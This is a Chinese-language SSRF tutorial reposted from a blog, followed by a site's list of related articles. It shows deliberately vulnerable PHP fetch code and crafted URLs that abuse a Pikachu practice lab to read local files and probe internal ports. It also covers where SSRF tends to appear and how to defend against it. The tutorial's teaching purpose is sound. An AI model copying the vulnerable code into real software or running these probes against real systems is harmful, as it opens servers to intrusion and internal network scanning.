基础漏洞——SSRF

<?php

if (isset($ _POST['url']))
{

$content = file_get_contents($ _POST['url']);//漏洞点，通过POST传输，获取web页面数据

$filename='./images/'.rand().';img1.jpg';//rand，随机产生文件名字.

file_put_contents($filename,$content);

echo $_POST['url'];

$img = "<img src=\"".$filename."\"/>";

}

echo $img;

?>

（2）Fsockopen()

以下代码使用fsockopen函数实现获取用户制定ur的数据(文件或者html)。这个函数会使用socket跟服务器建立tcp连接，传输原始数据。

前提：PHP fsockopen需要 PHP.ini 中 allow_url_fopen 选项开启。

allow_url_fopen = On

<?php 
function GetFile($host,$port,$link) 
{ 
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
/*$host：包含要连接的主机名（例如 "example.com"）或 IP 地址。这就是漏洞点参数。

intval($port)：将端口号转换为整数，通常是服务器监听的端口（例如 HTTP 的 80，HTTPS 的 443）。
$errno：连接失败时捕获错误编号的变量。
$errstr：连接失败时捕获错误信息的变量。
这两个导致敏感信息泄露，特别是在错误消息中暴露了系统或服务器的详细信息

30：连接尝试的超时时间（单位：秒）。*/

if (!$fp) { 
echo "$errstr (error number $errno) \n"; 
} else { 
$out = "GET $link HTTP/1.1\r\n"; 
$out .= "Host: $host\r\n"; 
$out .= "Connection: Close\r\n\r\n"; 
$out .= "\r\n"; 
fwrite($fp, $out); 
$contents=''; 
while (!feof($fp)) { 
$contents.= fgets($fp, 1024); 
} 
fclose($fp); 
return $contents; 
} 
}
?>

（3）Curl_exec()

在 PHP 中，`curl_exec()` 函数用于执行一个 cURL 会话。cURL（Client URL Library）是一个用来传输数据的工具和库，支持各种协议，如 HTTP、FTP、SMTP 等。文件/数据被下载并存储在"cured"文件夹下的磁盘中，并附加一个随机数和“.txt”文件扩展名。

<?php 
if (isset($_POST['url']))//检查 POST 请求：
{
$link = $_POST['url'];//获取 URL
$curlobj = curl_init();//初始化 cURL，初始化一个 cURL 会话。
curl_setopt($curlobj, CURLOPT_POST, 0);//设置为 GET 请求（CURLOPT_POST, 0）。
curl_setopt($curlobj,CURLOPT_URL,$link);//设置要访问的 URL。
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);/*将返回结果作为字符串而不是直接输出（CURLOPT_RETURNTRANSFER, 1）。*/

$result=curl_exec($curlobj);//执行 cURL 请求，执行 cURL 请求并将结果存储在 $result 中。
curl_close($curlobj);//关闭 cURL 会话，关闭 cURL 会话，释放资源。
$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result); /*生成文件名并保存结果，生成一个随机命名的文件名，将结果写入该文件。*/
echo $result;
}
?>

四.常见的业务场景（可能出现的漏洞的地方，漏洞挖掘）

1、分享，通过URL地址分享网页内容，通过URL获取目标页标签等内容

2、转码服务，适配手机屏幕大小，通过URL地址进行图片转码

3、图片加载与下载，通过URL加载网络图片（头像上传、等）

4、图片、文章收藏，通过URL获取目标的title等信息

5、其他加载URL的功能

1.分享，通过URL地址分享网页内容，通过URL获取目标页标签等内容

它访问了其他的网址

可以修改为内网服务器的IP地址，可以随便访问

实例

Pikachu靶场

点击

观察url

http://192.168.2.18/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php

修改后面的地址，百度域名

http://192.168.2.18/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.baidu.com

加载过来了，既然能读取第三方，那我是不是能读取内网里面的东西。

http://192.168.2.18/pikachu/vul/ssrf/ssrf_curl.php?url=file://D:/1.txt

我想要跨盘读取，这个过程是读不了的。

http://192.168.2.18/pikachu/vul/ssrf/ssrf_curl.php?url=file://C:/2.txt

这是因为这个不能跨盘读取。

我们可以通过ssrf来进行端口探测，这个的目的：如果探测到你的端口3306是开放的是不是说，知道你是mysql数据。

第一种情况

http://192.168.2.18/pikachu/vul/ssrf/ssrf_curl.php?url=http://192.168.2.18:3306

不允许连接，说明是开放的。

第二种情况

http://192.168.2.18/pikachu/vul/ssrf/ssrf_curl.php?url=http://192.168.2.18:445

秒反应，也是开启状态

第三种情况

http://192.168.2.18/pikachu/vul/ssrf/ssrf_curl.php?url=http://192.168.2.18:135

一直转圈圈，也是开放的

netstat -ant

第四种情况：这种就是没有开放

http://192.168.2.18/pikachu/vul/ssrf/ssrf_curl.php?url=http://192.168.2.18:1111

转了大概2秒就返回页面，页面没什么变化，说明端口未开放。

2.转码服务，适配手机屏幕大小，通过URL地址进行图片转码

转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览

由于手机屏幕大小的关系，直接浏览网页内容的时候会造成许多不便，因此有些公司提供了转码功能，把网页内容通过相关手段转为适合手机屏幕浏览的样式。例如百度、腾讯、搜狗等公司都有提供在线转码服务。

3.图片加载与下载，通过URL加载网络图片(头像上传、等)

在线翻译:通过URL地址翻译对应文本的内容。提供此功能的百度、有道等

4.图片、文章收藏，通过URL获取目标的title等信息

图片加载与下载:通过URL地址加载或下载图片

图片加载远程图片地址此功能用到的地方很多，但大多都是比较隐秘，比如在有些公司中的加载自家图片服务器上的图片用于展示。(此处可能会有人有疑问，为什么加载图片服务器上的图片也会有问题，直接使用img标签不就好了，没错是这样，但是开发者为了有更好的用户体验通常对图片做些微小调整例如加水印、压缩等，就必须要把图片下载到服务器的本地，所以就可能造成SSRF问题)

五.从URL关键字中寻找

share、 wap、 url.link、 src, source,target、 u、 3g、displaysourcellRL. imageURL、 domain

俗称的参数

？share=什么什么

五.SSRF漏洞利用(危害)

1.可以将中间服务当作跳板机，对外网，服务器所在内网，本地进行端口扫描，获取一些服务器的banner信息。

2.攻击运行在本地或内网应用程序，溢出攻击。

3.对内网web应用进行指纹识别。

4.攻击内外网的web应用，主要是使用get参数实现攻击。

5.利用一些伪协议（file）读取本地文件或远程文件。

六.SSRF漏防御

1.过滤返回的信息，也就是在讲返回结果展示给用户之前，先验证这个信息中符不符合标准。

2.同一错误信息，避免用户可以根据错误信息进行判断端口状态。

3.将一些无用的/危险的端口禁用，或者说限制ip访问。

4.制作白黑名单。

5.禁用一些不需要的协议，只用http/https请求。

原文地址：https://blog.csdn.net/2301_79096184/article/details/142411878

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！

上一篇：【速成Redis】04 Redis 概念扫盲：事务、持久化、主从复制、哨兵模式
下一篇：为什么Redis这么快及可以实现的功能

数据结构之存储位置
内存泄漏：如果没有适时释放被动态分配的内存，会导致内存泄露问题。未释放的内存一直占用系统资源，使得系统变慢并最终导致崩溃。内存释放，合理设计算法，避免算法问题导致的内存无线增长，合理设置作用域。这个数
阅读更多2024-09-22
gdb调试使用记录
使用 GDB（GNU Debugger）进行问题排查是非常有效的。且可以通过core文件进行排查bug，core文件是程序异常崩溃的时候(段错误，非法指令等)，系统自动生成的core文件。用户可以通过
阅读更多2024-09-22
Docker笔记-Docker Dockerfile
Docker笔记-Docker Dockerfile
阅读更多2024-09-22
Linux学习day02
动态库恰好相反，在编译链接的时候并没有把库文件的代码加入到可执行文件中，而是程序执行的狮虎由运行时链接文件加载库，这样可以节省系统的开支。动态库的后缀一般都是.so，像前边所提到的libc.so.6就
阅读更多2024-09-22
Docker镜像和容器
通过以上步骤，你就成功在 Docker 中搭建了一个 Ubuntu 20.04 的环境，并在其中安装了gcc以及运行了uptime命令。这种方法对于快速测试和开发非常有效。当你在 Docker 容器中
阅读更多2024-09-22
基于java&ssm课程实验教学系统设计
经过用户登录后，页面跳转至后台首页，main.php，首页是由2个页面组成的，包括top、left和center等页面，通过@ Register引入，这里也是浏览者操作系统功能的入口，系统首页主要介绍
阅读更多2024-09-22
AI健身之俯卧撑计数和姿态矫正-角度估计
AI健身之俯卧撑计数和姿态矫正-角度估计
阅读更多2024-09-22
漏洞复现_永恒之蓝
永恒之蓝（EternalBlue）是一个影响Windows操作系统的远程代码执行漏洞，编号为CVE-2017-0144，最初由美国国家安全局（NSA）开发并利用，后来被黑客组织Shadow Broke
阅读更多2024-09-22
#define定义
我们直接上例子理解这个地方的宏类似于函数，但是又不同于函数（后面会解释）cal(a)就是 4*4=16没问题但是为啥cal(b)就等于23呢？#define无论是定义常量还是宏，都是预处理的时候直接替
阅读更多2024-09-22
ArcGIS核密度分析（栅格处理范围与掩膜分析）
很多时候我们在进行栅格分析的时候，处理的结果不能完全覆盖我们需要的范围。比如，我们对点数据进行密度分析、栅格插值等。比如下图为什么会如此呢？那是因为在做这个密度分析或者栅格插值的时候，默认是以点的
阅读更多2024-09-22

基础漏洞——SSRF

一.原理

二.引起ssrf的函数

三.这些函数具体作用

（1）File_get_content()

（2）Fsockopen()

（3）Curl_exec()

四.常见的业务场景（可能出现的漏洞的地方，漏洞挖掘）

1.分享，通过URL地址分享网页内容，通过URL获取目标页标签等内容

第一种情况

第二种情况

第三种情况

第四种情况：这种就是没有开放